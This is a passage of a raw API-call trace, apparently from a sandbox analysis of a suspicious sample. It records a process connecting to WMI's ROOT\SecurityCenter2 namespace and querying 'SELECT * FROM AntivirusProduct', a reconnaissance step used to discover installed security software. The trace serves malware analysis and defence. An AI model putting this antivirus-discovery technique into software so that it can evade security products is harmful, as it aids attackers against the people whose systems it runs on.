[0266.385] CoGetContextToken (in: pToken=0x19e370 | out: pToken=0x19e370) returned 0x0 [0266.385] CoGetContextToken (in: pToken=0x19e778 | out: pToken=0x19e778) returned 0x0 [0266.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542970, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e808 | out: ppvObject=0x19e808*=0x0) returned 0x80004002 [0266.385] WbemDefPath:IUnknown:Release (This=0x5542970) returned 0x2 [0266.385] WbemDefPath:IUnknown:Release (This=0x5542970) returned 0x1 [0266.385] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0266.385] CoGetContextToken (in: pToken=0x19f060 | out: pToken=0x19f060) returned 0x0 [0266.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542970, riid=0x19f130*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f12c | out: ppvObject=0x19f12c*=0x5542970) returned 0x0 [0266.385] WbemDefPath:IUnknown:AddRef (This=0x5542970) returned 0x3 [0266.385] WbemDefPath:IUnknown:Release (This=0x5542970) returned 0x2 [0266.385] WbemDefPath:IWbemPath:SetText (This=0x5542970, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0266.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542970, puCount=0x19f2b0 | out: puCount=0x19f2b0*=0x2) returned 0x0 [0266.385] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f2ac*=0x0, pszText=0x0 | out: puBuffLength=0x19f2ac*=0x19, pszText=0x0) returned 0x0 [0266.385] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f2ac*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f2ac*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542970, puCount=0x19f29c | out: puCount=0x19f29c*=0x2) returned 0x0 [0266.385] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f298*=0x0, pszText=0x0 | out: puBuffLength=0x19f298*=0x19, pszText=0x0) returned 0x0 [0266.386] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f298*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f298*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.386] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f230 | out: ppv=0x19f230*=0x601a94) returned 0x0 [0266.386] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f228 | out: pAptType=0x19f228*=1) returned 0x0 [0266.386] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f22c | out: ppvObject=0x19f22c*=0x0) returned 0x80004002 [0266.386] IUnknown:Release (This=0x601a94) returned 0x1 [0266.387] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee50 | out: ppv=0x19ee50*=0x5544e88) returned 0x0 [0266.387] WbemLocator:IUnknown:QueryInterface (in: This=0x5544e88, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x0) returned 0x80004002 [0266.387] WbemLocator:IClassFactory:CreateInstance (in: This=0x5544e88, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f07c | out: ppvObject=0x19f07c*=0x54ba4b8) returned 0x0 [0266.387] WbemLocator:IUnknown:Release (This=0x5544e88) returned 0x0 [0266.387] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec9c | out: ppvObject=0x19ec9c*=0x54ba4b8) returned 0x0 [0266.387] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec58 | out: ppvObject=0x19ec58*=0x0) returned 0x80004002 [0266.387] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e84c | out: ppvObject=0x19e84c*=0x0) returned 0x80004002 [0266.387] WbemLocator:IUnknown:AddRef (This=0x54ba4b8) returned 0x3 [0266.387] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5b4 | out: ppvObject=0x19e5b4*=0x0) returned 0x80004002 [0266.388] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e564 | out: ppvObject=0x19e564*=0x0) returned 0x80004002 [0266.388] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e570 | out: ppvObject=0x19e570*=0x0) returned 0x80004002 [0266.388] CoGetContextToken (in: pToken=0x19e5d0 | out: pToken=0x19e5d0) returned 0x0 [0266.388] CoGetContextToken (in: pToken=0x19e9d8 | out: pToken=0x19e9d8) returned 0x0 [0266.388] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea68 | out: ppvObject=0x19ea68*=0x0) returned 0x80004002 [0266.388] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x2 [0266.388] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x1 [0266.388] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0266.388] CoGetContextToken (in: pToken=0x19efa8 | out: pToken=0x19efa8) returned 0x0 [0266.388] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x19f078*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f074 | out: ppvObject=0x19f074*=0x54ba4b8) returned 0x0 [0266.388] WbemLocator:IUnknown:AddRef (This=0x54ba4b8) returned 0x3 [0266.388] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x2 [0266.388] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542970, puCount=0x19f20c | out: puCount=0x19f20c*=0x2) returned 0x0 [0266.388] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=8, puBuffLength=0x19f208*=0x0, pszText=0x0 | out: puBuffLength=0x19f208*=0x19, pszText=0x0) returned 0x0 [0266.388] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=8, puBuffLength=0x19f208*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f208*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.388] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f0d0 | out: ppv=0x19f0d0*=0x54ba3c8) returned 0x0 [0266.389] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba3c8, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f178 | out: ppNamespace=0x19f178*=0x54b5540) returned 0x0 [0266.402] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5540, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f000 | out: ppvObject=0x19f000*=0x66fd4c) returned 0x0 [0266.402] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66fd4c, pProxy=0x54b5540, pAuthnSvc=0x19f050, pAuthzSvc=0x19f04c, pServerPrincName=0x19f044, pAuthnLevel=0x19f048, pImpLevel=0x19f038, pAuthInfo=0x19f03c, pCapabilites=0x19f040 | out: pAuthnSvc=0x19f050*=0xa, pAuthzSvc=0x19f04c*=0x0, pServerPrincName=0x19f044, pAuthnLevel=0x19f048*=0x6, pImpLevel=0x19f038*=0x2, pAuthInfo=0x19f03c, pCapabilites=0x19f040*=0x1) returned 0x0 [0266.402] WbemLocator:IUnknown:Release (This=0x66fd4c) returned 0x1 [0266.402] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5540, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff4 | out: ppvObject=0x19eff4*=0x66fd70) returned 0x0 [0266.402] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5540, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff0 | out: ppvObject=0x19eff0*=0x66fd4c) returned 0x0 [0266.402] WbemLocator:IClientSecurity:SetBlanket (This=0x66fd4c, pProxy=0x54b5540, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.403] WbemLocator:IUnknown:Release (This=0x66fd4c) returned 0x2 [0266.403] WbemLocator:IUnknown:Release (This=0x66fd70) returned 0x1 [0266.403] CoTaskMemFree (pv=0x54bc508) [0266.403] WbemLocator:IUnknown:Release (This=0x54ba3c8) returned 0x0 [0266.403] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5540, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebf0 | out: ppvObject=0x19ebf0*=0x66fd70) returned 0x0 [0266.403] WbemLocator:IUnknown:QueryInterface (in: This=0x66fd70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebac | out: ppvObject=0x19ebac*=0x0) returned 0x80004002 [0266.404] WbemLocator:IUnknown:QueryInterface (in: This=0x66fd70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9cc | out: ppvObject=0x19e9cc*=0x0) returned 0x80004002 [0266.404] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5540, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7a4 | out: ppvObject=0x19e7a4*=0x0) returned 0x80004002 [0266.405] WbemLocator:IUnknown:AddRef (This=0x66fd70) returned 0x3 [0266.405] WbemLocator:IUnknown:QueryInterface (in: This=0x66fd70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e50c | out: ppvObject=0x19e50c*=0x0) returned 0x80004002 [0266.405] WbemLocator:IUnknown:QueryInterface (in: This=0x66fd70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4bc | out: ppvObject=0x19e4bc*=0x0) returned 0x80004002 [0266.405] WbemLocator:IUnknown:QueryInterface (in: This=0x66fd70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4c8 | out: ppvObject=0x19e4c8*=0x66fccc) returned 0x0 [0266.405] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fccc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4d0 | out: pCid=0x19e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.405] WbemLocator:IUnknown:Release (This=0x66fccc) returned 0x3 [0266.405] CoGetContextToken (in: pToken=0x19e528 | out: pToken=0x19e528) returned 0x0 [0266.405] CoGetContextToken (in: pToken=0x19e930 | out: pToken=0x19e930) returned 0x0 [0266.406] WbemLocator:IUnknown:QueryInterface (in: This=0x66fd70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9c0 | out: ppvObject=0x19e9c0*=0x66fd54) returned 0x0 [0266.406] WbemLocator:IRpcOptions:Query (in: This=0x66fd54, pPrx=0x66fd70, dwProperty=2, pdwValue=0x19e9e8 | out: pdwValue=0x19e9e8) returned 0x80004002 [0266.406] WbemLocator:IUnknown:Release (This=0x66fd54) returned 0x3 [0266.406] WbemLocator:IUnknown:Release (This=0x66fd70) returned 0x2 [0266.406] CoGetContextToken (in: pToken=0x19ef00 | out: pToken=0x19ef00) returned 0x0 [0266.406] CoGetContextToken (in: pToken=0x19ee60 | out: pToken=0x19ee60) returned 0x0 [0266.406] WbemLocator:IUnknown:QueryInterface (in: This=0x66fd70, riid=0x19ef30*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef2c | out: ppvObject=0x19ef2c*=0x54b5540) returned 0x0 [0266.406] WbemLocator:IUnknown:AddRef (This=0x54b5540) returned 0x4 [0266.406] WbemLocator:IUnknown:Release (This=0x54b5540) returned 0x3 [0266.406] WbemLocator:IUnknown:Release (This=0x54b5540) returned 0x2 [0266.406] SysStringLen (param_1=0x0) returned 0x0 [0266.407] CoGetContextToken (in: pToken=0x19ef10 | out: pToken=0x19ef10) returned 0x0 [0266.407] WbemLocator:IUnknown:AddRef (This=0x66fd70) returned 0x3 [0266.407] WbemLocator:IUnknown:QueryInterface (in: This=0x66fd70, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eda4 | out: ppvObject=0x19eda4*=0x66fd70) returned 0x0 [0266.407] WbemLocator:IUnknown:Release (This=0x66fd70) returned 0x3 [0266.407] WbemLocator:IUnknown:Release (This=0x66fd70) returned 0x2 [0266.407] CoGetContextToken (in: pToken=0x19f008 | out: pToken=0x19f008) returned 0x0 [0266.407] WbemLocator:IUnknown:AddRef (This=0x54b5540) returned 0x3 [0266.407] IWbemServices:ExecQuery (in: This=0x54b5540, strQueryLanguage="WQL", strQuery="SELECT * FROM AntivirusProduct", lFlags=16, pCtx=0x0, ppEnum=0x19f214 | out: ppEnum=0x19f214*=0x663398) returned 0x0 [0266.450] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f078 | out: ppvObject=0x19f078*=0x66339c) returned 0x0 [0266.450] IClientSecurity:QueryBlanket (in: This=0x66339c, pProxy=0x663398, pAuthnSvc=0x19f0c8, pAuthzSvc=0x19f0c4, pServerPrincName=0x19f0bc, pAuthnLevel=0x19f0c0, pImpLevel=0x19f0b0, pAuthInfo=0x19f0b4, pCapabilites=0x19f0b8 | out: pAuthnSvc=0x19f0c8*=0xa, pAuthzSvc=0x19f0c4*=0x0, pServerPrincName=0x19f0bc, pAuthnLevel=0x19f0c0*=0x6, pImpLevel=0x19f0b0*=0x2, pAuthInfo=0x19f0b4, pCapabilites=0x19f0b8*=0x1) returned 0x0 [0266.450] IUnknown:Release (This=0x66339c) returned 0x1 [0266.450] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f06c | out: ppvObject=0x19f06c*=0x66f970) returned 0x0 [0266.450] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x66339c) returned 0x0 [0266.450] IClientSecurity:SetBlanket (This=0x66339c, pProxy=0x663398, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.452] IUnknown:Release (This=0x66339c) returned 0x2 [0266.452] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0266.452] CoTaskMemFree (pv=0x54bc508) [0266.452] IUnknown:QueryInterface (in: This=0x663398, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec64 | out: ppvObject=0x19ec64*=0x66f970) returned 0x0 [0266.452] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec20 | out: ppvObject=0x19ec20*=0x0) returned 0x80004002 [0266.453] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x0) returned 0x80004002 [0266.453] IUnknown:QueryInterface (in: This=0x663398, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0266.454] WbemLocator:IUnknown:AddRef (This=0x66f970) returned 0x3 [0266.454] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e57c | out: ppvObject=0x19e57c*=0x0) returned 0x80004002 [0266.454] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e52c | out: ppvObject=0x19e52c*=0x0) returned 0x80004002 [0266.454] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e538 | out: ppvObject=0x19e538*=0x66f8cc) returned 0x0 [0266.454] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f8cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e540 | out: pCid=0x19e540*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.454] WbemLocator:IUnknown:Release (This=0x66f8cc) returned 0x3 [0266.454] CoGetContextToken (in: pToken=0x19e598 | out: pToken=0x19e598) returned 0x0 [0266.454] CoGetContextToken (in: pToken=0x19e9a0 | out: pToken=0x19e9a0) returned 0x0 [0266.454] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea30 | out: ppvObject=0x19ea30*=0x66f954) returned 0x0 [0266.455] WbemLocator:IRpcOptions:Query (in: This=0x66f954, pPrx=0x66f970, dwProperty=2, pdwValue=0x19ea58 | out: pdwValue=0x19ea58) returned 0x80004002 [0266.455] WbemLocator:IUnknown:Release (This=0x66f954) returned 0x3 [0266.455] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x2 [0266.455] CoGetContextToken (in: pToken=0x19ef78 | out: pToken=0x19ef78) returned 0x0 [0266.455] CoGetContextToken (in: pToken=0x19eed8 | out: pToken=0x19eed8) returned 0x0 [0266.455] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x19efa8*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19efa4 | out: ppvObject=0x19efa4*=0x663398) returned 0x0 [0266.455] IUnknown:AddRef (This=0x663398) returned 0x4 [0266.455] IUnknown:Release (This=0x663398) returned 0x3 [0266.455] IUnknown:Release (This=0x663398) returned 0x2 [0266.455] WbemLocator:IUnknown:Release (This=0x54b5540) returned 0x2 [0266.455] SysStringLen (param_1=0x0) returned 0x0 [0266.455] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542970, puCount=0x19f260 | out: puCount=0x19f260*=0x2) returned 0x0 [0266.455] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f25c*=0x0, pszText=0x0 | out: puBuffLength=0x19f25c*=0x19, pszText=0x0) returned 0x0 [0266.455] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f25c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f25c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.455] CoGetContextToken (in: pToken=0x19f0b0 | out: pToken=0x19f0b0) returned 0x0 [0266.455] IUnknown:AddRef (This=0x663398) returned 0x3 [0266.455] IEnumWbemClassObject:Clone (in: This=0x663398, ppEnum=0x19f26c | out: ppEnum=0x19f26c*=0x663910) returned 0x0 [0266.456] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f130 | out: ppvObject=0x19f130*=0x663914) returned 0x0 [0266.456] IClientSecurity:QueryBlanket (in: This=0x663914, pProxy=0x663910, pAuthnSvc=0x19f180, pAuthzSvc=0x19f17c, pServerPrincName=0x19f174, pAuthnLevel=0x19f178, pImpLevel=0x19f168, pAuthInfo=0x19f16c, pCapabilites=0x19f170 | out: pAuthnSvc=0x19f180*=0xa, pAuthzSvc=0x19f17c*=0x0, pServerPrincName=0x19f174, pAuthnLevel=0x19f178*=0x6, pImpLevel=0x19f168*=0x2, pAuthInfo=0x19f16c, pCapabilites=0x19f170*=0x1) returned 0x0 [0266.456] IUnknown:Release (This=0x663914) returned 0x1 [0266.456] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f124 | out: ppvObject=0x19f124*=0x66fe70) returned 0x0 [0266.456] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f120 | out: ppvObject=0x19f120*=0x663914) returned 0x0 [0266.456] IClientSecurity:SetBlanket (This=0x663914, pProxy=0x663910, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.458] IUnknown:Release (This=0x663914) returned 0x2 [0266.458] WbemLocator:IUnknown:Release 